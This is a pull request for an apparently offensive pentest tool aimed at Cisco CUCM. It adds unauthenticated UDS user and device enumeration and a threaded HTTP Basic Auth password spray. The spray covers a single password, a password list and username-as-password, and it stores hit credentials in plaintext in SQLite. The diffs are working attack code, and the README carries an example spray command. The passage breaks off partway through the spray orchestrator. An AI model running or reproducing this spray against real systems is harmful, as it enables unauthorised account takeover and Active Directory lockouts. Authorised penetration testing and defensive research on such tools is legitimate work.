### PR TITLE
feat: unauthenticated UDS device enumeration and password spray

### DIFF
--- a/README.md
+++ b/README.md
@@ -15,6 +15,7 @@ Multi-threaded tool to automatically download and parse configuration files from
 - **Gowitness integration**: Load phone targets directly from gowitness database
 - **CSV export**: Export discovered credentials to CSV format
 - **User enumeration**: Extract usernames via CUCM User Data Services (UDS) API
+- **Password spray**: HTTP Basic Auth spray against the UDS user endpoint with persistent per-username rate limiting and a pre-flight oracle probe
 
 ## Usage
 
@@ -75,6 +76,24 @@ Extract usernames via CUCM UDS API:
 ./thief.py -H <CUCM Server> --userenum
 ```
 
+### Password Spray
+
+Spray a single password across every UDS-enumerated user, with a default 1-hour-per-user rate limit:
+
+```bash
+./thief.py -H <CUCM Server> --spray --spray-password 'Summer2025!'
+```
+
+Iterate a password list, sleeping ~1 hour between rounds so each user is attempted at most once per hour:
+
+```bash
+./thief.py -H <CUCM Server> --spray -P passwords.txt
+```
+
+A pre-flight oracle probe sends one bogus credential to verify the endpoint validates auth. If the server returns 200 to a known-bad password, the run aborts before any real password is sent. Skip the probe with `--no-spray-probe` only after manually verifying the target. Every attempt is logged to the `spray_attempts` table; hits surface in `--show-db`.
+
+**Operator safety:** If CUCM is configured with LDAP Authentication, end-user spray attempts pass through to AD. Confirm domain lockout policy before running and tighten `--spray-rate-limit-hours` if needed.
+
 ### Database Operations
 
 View cached results:
@@ -125,6 +144,12 @@ Export to CSV:
 - `--servers`: Enumerate CUCM cluster members (hostnames + IPs) via UDS `/cucm-uds/servers` — requires `-H`
 - `--http`: Use HTTP (port 6970) as the primary config download protocol with TFTP fallback (default: TFTP first, HTTP fallback)
 - `--uds-port PORT`: Override the CUCM UDS API HTTPS port for `--userenum` (default: 8443)
+- `--spray`: Password-spray the UDS API (requires `-H`; mutually exclusive with `--brute-mac`)
+- `--spray-password PASSWORD`: Single password to spray across all eligible users
+- `-P, --passwords FILE`: Password list file; sprays each password in turn, sleeping ~1h between rounds
+- `--spray-threads N`: Concurrent spray workers (default: 10)
+- `--spray-rate-limit-hours N`: Per-username rate-limit window in hours (default: 1)
+- `--no-spray-probe`: Skip the pre-flight oracle probe (use only after manual verification)
 
 ### Output Options
 - `--csv FILENAME`: Export discovered credentials to CSV file

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -737,7 +737,7 @@ def _load_password_list(path):
         return [line.strip() for line in f if line.strip()]
 
 
-def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_flag, timeout=10):
+def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_flag, timeout=10, user_as_pass=False):
     """
     Thread target. Pops usernames off work_queue and attempts Basic Auth GET
     against /cucm-uds/user/{username}. Logs every attempt to spray_attempts.
@@ -751,11 +751,12 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
         except queue.Empty:
             return
 
+        effective_password = username if user_as_pass else password
         url = f'https://{cucm_host}:{port}/cucm-uds/user/{quote(username, safe="")}'
         status_code = None
         error = None
         try:
-            resp = requests.get(url, auth=(username, password), verify=False, timeout=timeout)
+            resp = requests.get(url, auth=(username, effective_password), verify=False, timeout=timeout)
             status_code = resp.status_code
         except requests.exceptions.Timeout as e:
             error = f'timeout: {e}'
@@ -764,7 +765,7 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
         except Exception as e:
             error = f'{type(e).__name__}: {e}'
 
-        log_spray_attempt(cucm_host, username, password, status_code, error, db_file)
+        log_spray_attempt(cucm_host, username, effective_password, status_code, error, db_file)
 
         with results['lock']:
             if status_code == 200:
@@ -777,7 +778,7 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
                 results['other'] += 1
 
 
-def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_file):
+def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_file, user_as_pass=False):
     """
     Top-level orchestrator for the UDS Basic-Auth password spray.
 
@@ -819,9 +820,10 @@ def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_f
     record_uds_users(cucm_host, users, db_file)
     print(f'[+] Loaded {len(users)} users from UDS API.')
 
-    # 3. Per-password rounds
-    total_rounds = len(passwords)
-    for round_index, password in enumerate(passwords, start=1):
+    # 3. Per-password rounds (user_as_pass runs as a single implicit round)
+    rounds = [(1, None)] if user_as_pass else list(enumerate(passwords, start=1))
+    total_rounds = len(rounds)
+    for round_index, password in rounds:
         # 3a. Build filtered work queue on the main thread (TOCTOU-safe).
         work = queue.Queue()
         skipped = 0
@@ -831,11 +833,12 @@ def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_f
             else:
                 work.put(username)
         eligible = work.qsize()
+        label = 'username-as-password' if user_as_pass else password
         print(f'[round {round_index}/{total_rounds}] eligible={eligible} skipped={skipped} '
               f'(rate-limited within last {rate_limit_hours}h)')
 
         if eligible == 0:
-            print(f'[round {round_index}/{total_rounds}] no eligible users; skipping password.')
+            print(f'[round {round_index}/{total_rounds}] no eligible users; skipping.')
         else:
             # 3b. Worker pool
             results = {'hits': 0, 'misses': 0, 'errors': 0, 'other': 0, 'lock': threading.Lock()}
@@ -845,6 +848,7 @@ def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_f
                 t = threading.Thread(
                     target=_spray_worker,
                     args=(work, results, password, cucm_host, port, db_file, dead_flag),
+                    kwargs={'user_as_pass': user_as_pass},
                     daemon=True,
                 )
                 t.start()
@@ -1721,6 +1725,8 @@ def main():
                         help='Single password to spray across all eligible users')
     parser.add_argument('-P', '--passwords', type=str, default=None, metavar='FILE',
                         help='Password list file; one password per line; rounds separated by ~1h sleep')
+    parser.add_argument('--spray-user-as-pass', action='store_true', default=False,
+                        help='Spray each user with their own username as the password')
     parser.add_argument('--spray-threads', type=int, default=10,
                         help='Concurrent spray workers (default: 10)')
     parser.add_argument('--spray-rate-limit-hours', type=int, default=1,
@@ -1927,10 +1933,15 @@ def main():
         if args.brute_mac:
             print('--spray and --brute-mac are mutually exclusive')
             quit(1)
-        if (args.spray_password is not None) == (args.passwords is not None):
-            # Both set, or neither set — both are errors.
-            print('--spray requires exactly one of --spray-password or -P/--passwords')
+        options_set = sum([
+            args.spray_password is not None,
+            args.passwords is not None,
+            args.spray_user_as_pass,
+        ])
+        if options_set != 1:
+            print('--spray requires exactly one of --spray-password, -P/--passwords, or --spray-user-as-pass')
             quit(1)
+        passwords = []
         if args.passwords:
             try:
                 passwords = _load_password_list(args.passwords)
@@ -1943,7 +1954,7 @@ def main():
             if not passwords:
                 print(f'[-] Password file is empty: {args.passwords}')
                 quit(1)
-        else:
+        elif args.spray_password is not None:
             passwords = [args.spray_password]
 
         run_spray(
@@ -1954,6 +1965,7 @@ def main():
             rate_limit_hours=args.spray_rate_limit_hours,
             probe=not args.no_spray_probe,
             db_file=db_file,
+            user_as_pass=args.spray_user_as_pass,
         )
         quit(0)
 

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -638,6 +638,40 @@ def record_uds_users(cucm_host, usernames, db_file='thief.db'):
         return 0
 
 
+def log_spray_attempt(cucm_host, username, password, status_code, error, db_file='thief.db'):
+    """
+    Append a row to spray_attempts. Retries with exponential backoff on
+    SQLite 'database is locked' since worker threads write concurrently.
+    """
+    max_retries = 5
+    retry_delay = 0.1
+    timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
+
+    for attempt in range(max_retries):
+        try:
+            conn = sqlite3.connect(db_file, timeout=30.0)
+            cursor = conn.cursor()
+            cursor.execute('''
+                INSERT INTO spray_attempts
+                    (cucm_host, username, password, status_code, error, attempt_time)
+                VALUES (?, ?, ?, ?, ?, ?)
+            ''', (cucm_host, username, password, status_code, error, timestamp))
+            conn.commit()
+            conn.close()
+            return
+        except sqlite3.OperationalError as e:
+            if 'locked' in str(e).lower() and attempt < max_retries - 1:
+                time.sleep(retry_delay * (2 ** attempt))
+                continue
+            if globals().get('debug', False):
+                print(f'[!] log_spray_attempt sqlite error: {e}')
+            return
+        except Exception as e:
+            if globals().get('debug', False):
+                print(f'[!] log_spray_attempt error: {e}')
+            return
+
+
 def search_for_secrets(CUCM_host, filename, use_tftp=True):
     if debug:
         print(f'[DEBUG] Processing config file: {filename}')

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -1445,6 +1445,30 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
             else:
                 raise
 
+        # Get UDS spray hits (status_code == 200)
+        spray_hits = []
+        try:
+            if cucm_filter:
+                cursor.execute('''
+                    SELECT cucm_host, username, password, attempt_time
+                      FROM spray_attempts
+                     WHERE status_code = 200 AND cucm_host = ?
+                     ORDER BY attempt_time DESC
+                ''', (cucm_filter,))
+            else:
+                cursor.execute('''
+                    SELECT cucm_host, username, password, attempt_time
+                      FROM spray_attempts
+                     WHERE status_code = 200
+                     ORDER BY attempt_time DESC
+                ''')
+            spray_hits = cursor.fetchall()
+        except sqlite3.OperationalError as e:
+            if 'no such table' in str(e):
+                spray_hits = []
+            else:
+                raise
+
         # Get download stats (handle missing table gracefully)
         total_attempts = 0
         successful_downloads = 0
@@ -1472,7 +1496,7 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
         
         conn.close()
         
-        if not credentials and not usernames and not mac_prefixes and not phone_cucm and not cluster_servers:
+        if not credentials and not usernames and not mac_prefixes and not phone_cucm and not cluster_servers and not spray_hits:
             print(f'\n[-] No data found in database')
             if cucm_filter:
                 print(f'[-] Filter: CUCM host = {cucm_filter}')
@@ -1574,6 +1598,11 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
             print("-"*70)
             for queried, hostname, ipv4, ipv6, srv_type, timestamp in cluster_servers:
                 print(f'{queried:<24} {(hostname or ""):<30} {(ipv4 or ""):<16}')
+
+        if spray_hits:
+            print('\n=== UDS Spray Hits ===')
+            for host, user, pw, ts in spray_hits:
+                print(f'  [{ts}] {host}  {user} : {pw}')
 
         print(f'\n{"="*70}')
         print(f'\n\033[1mDATABASE STATISTICS:\033[0m')

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -674,6 +674,82 @@ def log_spray_attempt(cucm_host, username, password, status_code, error, db_file
             return
 
 
+def parse_uds_devices(xml_body):
+    """Extract SEP device names from a /cucm-uds/user/{id} XML response body."""
+    return re.findall(r'<device>(SEP[0-9A-Fa-f]{12})</device>', xml_body)
+
+
+def log_uds_device(cucm_host, username, device_name, source, db_file='thief.db'):
+    """Insert a (cucm_host, username, device_name) row into uds_devices; ignores duplicates."""
+    timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
+    try:
+        conn = sqlite3.connect(db_file, timeout=30.0)
+        conn.execute(
+            'INSERT OR IGNORE INTO uds_devices '
+            '(cucm_host, username, device_name, source, discovery_time) '
+            'VALUES (?, ?, ?, ?, ?)',
+            (cucm_host, username, device_name, source, timestamp),
+        )
+        conn.commit()
+        conn.close()
+    except Exception as e:
+        if globals().get('debug', False):
+            print(f'[!] log_uds_device error: {e}')
+
+
+def get_user_devices_unauthenticated(cucm_host, port=UDS_PORT, username='', timeout=10):
+    """
+    Probe /cucm-uds/user/{username} with no credentials.
+    Returns a list of SEP device names if the server responds 200, else [].
+    """
+    url = f'https://{cucm_host}:{port}/cucm-uds/user/{quote(username, safe="")}'
+    try:
+        resp = requests.get(url, verify=False, timeout=timeout)
+        if resp.status_code == 200:
+            return parse_uds_devices(resp.text)
+    except Exception:
+        pass
+    return []
+
+
+def enumerate_devices_unauthenticated(cucm_host, port, usernames, db_file, threads=10, _probe_fn=None):
+    """
+    Fan out unauthenticated device probes across all usernames in parallel.
+    Logs found SEP names to uds_devices with source='userenum'.
+    Returns the count of users for whom at least one device was found.
+    _probe_fn is injectable for testing.
+    """
+    if _probe_fn is None:
+        _probe_fn = get_user_devices_unauthenticated
+
+    found_count = 0
+    lock = threading.Lock()
+    work = queue.Queue()
+    for u in usernames:
+        work.put(u)
+
+    def worker():
+        nonlocal found_count
+        while True:
+            try:
+                username = work.get_nowait()
+            except queue.Empty:
+                return
+            devices = _probe_fn(cucm_host, port, username)
+            if devices:
+                with lock:
+                    found_count += 1
+                for device_name in devices:
+                    log_uds_device(cucm_host, username, device_name, 'userenum', db_file)
+
+    thread_list = [threading.Thread(target=worker, daemon=True) for _ in range(max(1, min(threads, len(usernames))))]
+    for t in thread_list:
+        t.start()
+    for t in thread_list:
+        t.join()
+    return found_count
+
+
 def is_user_rate_limited(username, db_file='thief.db', hours=1):
     """
     Return True iff `username` has any spray_attempts row within the last `hours`.
@@ -755,6 +831,7 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
         url = f'https://{cucm_host}:{port}/cucm-uds/user/{quote(username, safe="")}'
         status_code = None
         error = None
+        resp = None
         try:
             resp = requests.get(url, auth=(username, effective_password), verify=False, timeout=timeout)
             status_code = resp.status_code
@@ -766,6 +843,10 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
             error = f'{type(e).__name__}: {e}'
 
         log_spray_attempt(cucm_host, username, effective_password, status_code, error, db_file)
+
+        if status_code == 200 and resp is not None:
+            for device_name in parse_uds_devices(resp.text):
+                log_uds_device(cucm_host, username, device_name, 'spray_hit', db_file)
 
         with results['lock']:
             if status_code == 200:
@@ -1108,6 +1189,19 @@ def init_database(db_file='thief.db'):
     cursor.execute('''
         CREATE INDEX IF NOT EXISTS idx_spray_attempts_user_time
             ON spray_attempts(username, attempt_time)
+    ''')
+
+    # Create table for devices discovered via UDS (unauthenticated probe or spray hit)
+    cursor.execute('''
+        CREATE TABLE IF NOT EXISTS uds_devices (
+            id INTEGER PRIMARY KEY AUTOINCREMENT,
+            cucm_host TEXT NOT NULL,
+            username TEXT NOT NULL,
+            device_name TEXT NOT NULL,
+            source TEXT NOT NULL,
+            discovery_time TEXT NOT NULL,
+            UNIQUE(cucm_host, username, device_name)
+        )
     ''')
 
     conn.commit()
@@ -1483,19 +1577,42 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
             else:
                 raise
 
+        # Get UDS devices (unauthenticated enum or spray hit)
+        uds_devices = []
+        try:
+            if cucm_filter:
+                cursor.execute('''
+                    SELECT cucm_host, username, device_name, source, discovery_time
+                      FROM uds_devices
+                     WHERE cucm_host = ?
+                     ORDER BY username, device_name
+                ''', (cucm_filter,))
+            else:
+                cursor.execute('''
+                    SELECT cucm_host, username, device_name, source, discovery_time
+                      FROM uds_devices
+                     ORDER BY username, device_name
+                ''')
+            uds_devices = cursor.fetchall()
+        except sqlite3.OperationalError as e:
+            if 'no such table' in str(e):
+                uds_devices = []
+            else:
+                raise
+
         # Get download stats (handle missing table gracefully)
         total_attempts = 0
         successful_downloads = 0
         try:
             if cucm_filter:
                 cursor.execute('''
-                    SELECT COUNT(*), SUM(success) 
-                    FROM download_attempts 
+                    SELECT COUNT(*), SUM(success)
+                    FROM download_attempts
                     WHERE cucm_host = ?
                 ''', (cucm_filter,))
             else:
                 cursor.execute('''
-                    SELECT COUNT(*), SUM(success) 
+                    SELECT COUNT(*), SUM(success)
                     FROM download_attempts
                 ''')
             stats = cursor.fetchone()
@@ -1507,10 +1624,10 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
                 successful_downloads = 0
             else:
                 raise
-        
+
         conn.close()
         
-        if not credentials and not usernames and not mac_prefixes and not phone_cucm and not cluster_servers and not spray_hits:
+        if not credentials and not usernames and not mac_prefixes and not phone_cucm and not cluster_servers and not spray_hits and not uds_devices:
             print(f'\n[-] No data found in database')
             if cucm_filter:
                 print(f'[-] Filter: CUCM host = {cucm_filter}')
@@ -1617,6 +1734,14 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
             print('\n=== UDS Spray Hits ===')
             for host, user, pw, ts in spray_hits:
                 print(f'  [{ts}] {host}  {user} : {pw}')
+
+        if uds_devices:
+            print(f'\n\033[1m[+] UDS Devices ({len(uds_devices)} total)\033[0m')
+            print("-"*70)
+            print(f'{"Username":<24} {"Device":<20} {"Source":<12} {"CUCM Host"}')
+            print("-"*70)
+            for cucm_host_row, username, device_name, source, ts in uds_devices:
+                print(f'{username:<24} {device_name:<20} {source:<12} {cucm_host_row}')
 
         print(f'\n{"="*70}')
         print(f'\n\033[1mDATABASE STATISTICS:\033[0m')
@@ -1922,6 +2047,15 @@ def main():
             if debug:
                 for username in unique_users:
                     print(f'{username}')
+            if not no_db:
+                print(f'[*] Probing UDS for associated devices (unauthenticated)...')
+                found = enumerate_devices_unauthenticated(
+                    CUCM_host, args.uds_port, unique_users, db_file, threads=threads,
+                )
+                if found:
+                    print(f'[+] Found devices for {found} user(s) — see --show-db for details')
+                else:
+                    print(f'[-] No device associations returned unauthenticated')
         else:
             print('[-] No users returned from UDS API. Re-run with -d for request/response details.')
         quit(0)

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -1108,6 +1108,15 @@ def init_database(db_file='thief.db'):
 
     conn.commit()
     conn.close()
+    # Tighten DB file permissions — config XML and spray attempts contain
+    # plaintext secrets; default umask can leave them world-readable.
+    try:
+        os.chmod(db_file, 0o600)
+    except OSError:
+        # Best-effort: on filesystems without POSIX perms (FAT, some network
+        # mounts) chmod will fail. The operator still has the DB; we just
+        # couldn't restrict access. Not fatal.
+        pass
     return db_file
 
 def check_already_attempted(cucm_host, filename, db_file='thief.db'):

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -727,6 +727,15 @@ def _spray_oracle_check(cucm_host, port, user_sample, timeout=10):
     return 'unknown'
 
 
+def _load_password_list(path):
+    """
+    Read one password per line, stripping whitespace and skipping blanks.
+    Preserves order and duplicates.
+    """
+    with open(path, 'r', encoding='utf-8', errors='replace') as f:
+        return [line.strip() for line in f if line.strip()]
+
+
 def search_for_secrets(CUCM_host, filename, use_tftp=True):
     if debug:
         print(f'[DEBUG] Processing config file: {filename}')

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -810,6 +810,35 @@ def init_database(db_file='thief.db'):
         )
     ''')
 
+    # Create table for users enumerated via UDS /cucm-uds/users (spray feature)
+    cursor.execute('''
+        CREATE TABLE IF NOT EXISTS uds_users (
+            id INTEGER PRIMARY KEY AUTOINCREMENT,
+            cucm_host TEXT NOT NULL,
+            username TEXT NOT NULL,
+            first_seen TEXT NOT NULL,
+            last_seen TEXT NOT NULL,
+            UNIQUE(cucm_host, username)
+        )
+    ''')
+
+    # Create table for every spray attempt against the UDS user endpoint
+    cursor.execute('''
+        CREATE TABLE IF NOT EXISTS spray_attempts (
+            id INTEGER PRIMARY KEY AUTOINCREMENT,
+            cucm_host TEXT NOT NULL,
+            username TEXT NOT NULL,
+            password TEXT NOT NULL,
+            status_code INTEGER,
+            error TEXT,
+            attempt_time TEXT NOT NULL
+        )
+    ''')
+    cursor.execute('''
+        CREATE INDEX IF NOT EXISTS idx_spray_attempts_user_time
+            ON spray_attempts(username, attempt_time)
+    ''')
+
     conn.commit()
     conn.close()
     return db_file

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -608,6 +608,36 @@ def log_uds_usernames_to_db(cucm_host, usernames, db_file='thief.db'):
             print(f'[!] log_uds_usernames_to_db error: {e}')
         return False
 
+
+def record_uds_users(cucm_host, usernames, db_file='thief.db'):
+    """
+    Upsert the live UDS user enumeration into the uds_users table.
+
+    On conflict (same cucm_host + username), updates last_seen but preserves
+    first_seen. Returns the number of new rows inserted.
+    """
+    try:
+        conn = sqlite3.connect(db_file, timeout=30.0)
+        cursor = conn.cursor()
+        timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
+        inserted = 0
+        for username in usernames:
+            cursor.execute('''
+                INSERT INTO uds_users (cucm_host, username, first_seen, last_seen)
+                VALUES (?, ?, ?, ?)
+                ON CONFLICT(cucm_host, username)
+                  DO UPDATE SET last_seen = excluded.last_seen
+            ''', (cucm_host, username, timestamp, timestamp))
+            inserted += cursor.rowcount
+        conn.commit()
+        conn.close()
+        return inserted
+    except Exception as e:
+        if globals().get('debug', False):
+            print(f'[!] record_uds_users error: {e}')
+        return 0
+
+
 def search_for_secrets(CUCM_host, filename, use_tftp=True):
     if debug:
         print(f'[DEBUG] Processing config file: {filename}')

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -15,6 +15,7 @@ import time
 import threading
 import queue
 import random
+import secrets
 from datetime import datetime
 from contextlib import redirect_stdout, redirect_stderr
 from bs4 import BeautifulSoup
@@ -695,6 +696,35 @@ def is_user_rate_limited(username, db_file='thief.db', hours=1):
             print(f'[!] is_user_rate_limited error: {e}')
         # Fail closed: if we can't check, assume limited (don't spray).
         return True
+
+
+def _spray_oracle_check(cucm_host, port, user_sample, timeout=10):
+    """
+    Probe /cucm-uds/user/<user_sample> with HTTP Basic Auth using a deliberately
+    bogus password. Used to verify the target actually validates creds before
+    burning a real password across the user list.
+
+    Returns:
+        'ok'      — got 401, endpoint validates creds normally.
+        'bypass'  — got 200, endpoint returned user data for a bogus password.
+                    DO NOT proceed; spraying real creds would be a free oracle bypass.
+        'unknown' — anything else (403/404/5xx/network error). Operator must
+                    decide whether to continue with --no-spray-probe.
+    """
+    bogus = f'spray-probe-{secrets.token_hex(4)}'
+    url = f'https://{cucm_host}:{port}/cucm-uds/user/{user_sample}'
+    dbg(f'UDS oracle probe GET {url} (timeout={timeout}s)')
+    try:
+        resp = requests.get(url, auth=(user_sample, bogus), verify=False, timeout=timeout)
+    except Exception as e:
+        dbg(f'UDS oracle probe raised {type(e).__name__}: {e}')
+        return 'unknown'
+    dbg(f'UDS oracle probe -> {resp.status_code} ({len(resp.content)} bytes)')
+    if resp.status_code == 401:
+        return 'ok'
+    if resp.status_code == 200:
+        return 'bypass'
+    return 'unknown'
 
 
 def search_for_secrets(CUCM_host, filename, use_tftp=True):

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -1888,7 +1888,7 @@ def main():
         if args.brute_mac:
             print('--spray and --brute-mac are mutually exclusive')
             quit(1)
-        if bool(args.spray_password) == bool(args.passwords):
+        if (args.spray_password is not None) == (args.passwords is not None):
             # Both set, or neither set — both are errors.
             print('--spray requires exactly one of --spray-password or -P/--passwords')
             quit(1)

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -1675,7 +1675,20 @@ def main():
     parser.add_argument('--servers', action='store_true', default=False, help='Enumerate the CUCM cluster topology via UDS /cucm-uds/servers (requires -H)')
     parser.add_argument('--http', action='store_true', default=False, help='Use HTTP (port 6970) as the primary download protocol, with TFTP fallback (default: TFTP first, HTTP fallback)')
     parser.add_argument('--uds-port', type=int, default=UDS_PORT, help=f'CUCM UDS API HTTPS port for --userenum (default: {UDS_PORT})')
-    
+    # Password spray (UDS Basic Auth against /cucm-uds/user/{userid})
+    parser.add_argument('--spray', action='store_true', default=False,
+                        help='Password-spray the UDS API (requires -H; mutually exclusive with --brute-mac)')
+    parser.add_argument('--spray-password', type=str, default=None,
+                        help='Single password to spray across all eligible users')
+    parser.add_argument('-P', '--passwords', type=str, default=None, metavar='FILE',
+                        help='Password list file; one password per line; rounds separated by ~1h sleep')
+    parser.add_argument('--spray-threads', type=int, default=10,
+                        help='Concurrent spray workers (default: 10)')
+    parser.add_argument('--spray-rate-limit-hours', type=int, default=1,
+                        help='Per-username rate-limit window in hours (default: 1)')
+    parser.add_argument('--no-spray-probe', action='store_true', default=False,
+                        help='Skip the pre-flight oracle probe (use only after manual verification)')
+
     # Output Options
     parser.add_argument('--csv', type=str, metavar='FILENAME', help='Export discovered credentials to CSV file')
     parser.add_argument('--outfile', type=str, default='cucm_users.txt', help='Specify output file for enumerated usernames (default: cucm_users.txt)')
@@ -1866,6 +1879,40 @@ def main():
                     print(f'{username}')
         else:
             print('[-] No users returned from UDS API. Re-run with -d for request/response details.')
+        quit(0)
+
+    if args.spray:
+        if not CUCM_host:
+            print('--spray requires -H/--host to specify the CUCM server')
+            quit(1)
+        if args.brute_mac:
+            print('--spray and --brute-mac are mutually exclusive')
+            quit(1)
+        if bool(args.spray_password) == bool(args.passwords):
+            # Both set, or neither set — both are errors.
+            print('--spray requires exactly one of --spray-password or -P/--passwords')
+            quit(1)
+        if args.passwords:
+            try:
+                passwords = _load_password_list(args.passwords)
+            except FileNotFoundError:
+                print(f'[-] Password file not found: {args.passwords}')
+                quit(1)
+            if not passwords:
+                print(f'[-] Password file is empty: {args.passwords}')
+                quit(1)
+        else:
+            passwords = [args.spray_password]
+
+        run_spray(
+            cucm_host=CUCM_host,
+            port=args.uds_port,
+            passwords=passwords,
+            threads=args.spray_threads,
+            rate_limit_hours=args.spray_rate_limit_hours,
+            probe=not args.no_spray_probe,
+            db_file=db_file,
+        )
         quit(0)
 
     # Handle MAC brute forcing from detected phones

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -742,7 +742,7 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
     against /cucm-uds/user/{username}. Logs every attempt to spray_attempts.
 
     results: dict with int keys 'hits'/'misses'/'errors'/'other' and 'lock'.
-    dead_flag: threading.Event set by the orchestrator to abort a runaway round.
+    dead_flag: threading.Event — externally-settable abort signal that short-circuits the worker loop between iterations (used by tests; future versions may set this from the orchestrator for mid-round aborts).
     """
     while not dead_flag.is_set():
         try:
@@ -786,6 +786,9 @@ def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_f
       3. For each password: build rate-limit-filtered queue, run worker pool,
          compute kill switch, sleep ~1h before the next password.
     """
+    if _TEST_MODE:
+        return
+
     # 1. Probe
     if probe:
         # Need at least one user to probe; do a tiny pre-enum if necessary.
@@ -853,7 +856,11 @@ def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_f
                   f'misses={results["misses"]} errors={results["errors"]} '
                   f'other={results["other"]} (skipped {skipped})')
 
-            # 3c. Kill switch — >50% of attempts returned non-401-non-200.
+            # 3c. Kill switch — fires AFTER all workers join. If >50% of the
+            # round's attempts returned non-401-non-200 status AND we attempted
+            # at least 4 (min sample guard), abort the run before the next
+            # password round. The current round's in-flight attempts complete
+            # before the abort decision; mid-round abort is not implemented in v1.
             bad = results['errors'] + results['other']
             if total_attempted >= 4 and bad / total_attempted > 0.5:
                 print(f'[!] KILL SWITCH: {bad}/{total_attempted} attempts returned errors or '

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -17,6 +17,7 @@ import queue
 import random
 import secrets
 from datetime import datetime
+from urllib.parse import quote
 from contextlib import redirect_stdout, redirect_stderr
 from bs4 import BeautifulSoup
 from alive_progress import alive_bar
@@ -712,7 +713,7 @@ def _spray_oracle_check(cucm_host, port, user_sample, timeout=10):
                     decide whether to continue with --no-spray-probe.
     """
     bogus = f'spray-probe-{secrets.token_hex(4)}'
-    url = f'https://{cucm_host}:{port}/cucm-uds/user/{user_sample}'
+    url = f'https://{cucm_host}:{port}/cucm-uds/user/{quote(user_sample, safe="")}'
     dbg(f'UDS oracle probe GET {url} (timeout={timeout}s)')
     try:
         resp = requests.get(url, auth=(user_sample, bogus), verify=False, timeout=timeout)
@@ -750,7 +751,7 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
         except queue.Empty:
             return
 
-        url = f'https://{cucm_host}:{port}/cucm-uds/user/{username}'
+        url = f'https://{cucm_host}:{port}/cucm-uds/user/{quote(username, safe="")}'
         status_code = None
         error = None
         try:

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -776,6 +776,97 @@ def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_
                 results['other'] += 1
 
 
+def run_spray(cucm_host, port, passwords, threads, rate_limit_hours, probe, db_file):
+    """
+    Top-level orchestrator for the UDS Basic-Auth password spray.
+
+    Sequence:
+      1. Pre-flight oracle probe (unless probe=False).
+      2. Enumerate users from /cucm-uds/users, persist to uds_users.
+      3. For each password: build rate-limit-filtered queue, run worker pool,
+         compute kill switch, sleep ~1h before the next password.
+    """
+    # 1. Probe
+    if probe:
+        # Need at least one user to probe; do a tiny pre-enum if necessary.
+        sample_users = get_users_api(cucm_host, port=port)
+        if not sample_users:
+            print('[-] No users returned from UDS; cannot probe or spray.')
+            return
+        oracle_result = _spray_oracle_check(cucm_host, port, sample_users[0])
+        if oracle_result == 'bypass':
+            print('[!] ORACLE BYPASS: /cucm-uds/user/{userid} returned 200 for a bogus password.')
+            print('[!] The endpoint is not validating credentials. Aborting before any real password is sent.')
+            return
+        if oracle_result == 'unknown':
+            print('[-] Oracle probe returned an unexpected status. Aborting.')
+            print('[-] Re-run with --no-spray-probe if you have already verified the target out-of-band.')
+            return
+        print('[+] Oracle probe OK (401 returned for bogus credentials).')
+        users = sample_users
+    else:
+        users = get_users_api(cucm_host, port=port)
+
+    if not users:
+        print('[-] No users returned from UDS. Nothing to spray.')
+        return
+
+    # 2. Persist enumeration
+    record_uds_users(cucm_host, users, db_file)
+    print(f'[+] Loaded {len(users)} users from UDS API.')
+
+    # 3. Per-password rounds
+    total_rounds = len(passwords)
+    for round_index, password in enumerate(passwords, start=1):
+        # 3a. Build filtered work queue on the main thread (TOCTOU-safe).
+        work = queue.Queue()
+        skipped = 0
+        for username in users:
+            if is_user_rate_limited(username, db_file, hours=rate_limit_hours):
+                skipped += 1
+            else:
+                work.put(username)
+        eligible = work.qsize()
+        print(f'[round {round_index}/{total_rounds}] eligible={eligible} skipped={skipped} '
+              f'(rate-limited within last {rate_limit_hours}h)')
+
+        if eligible == 0:
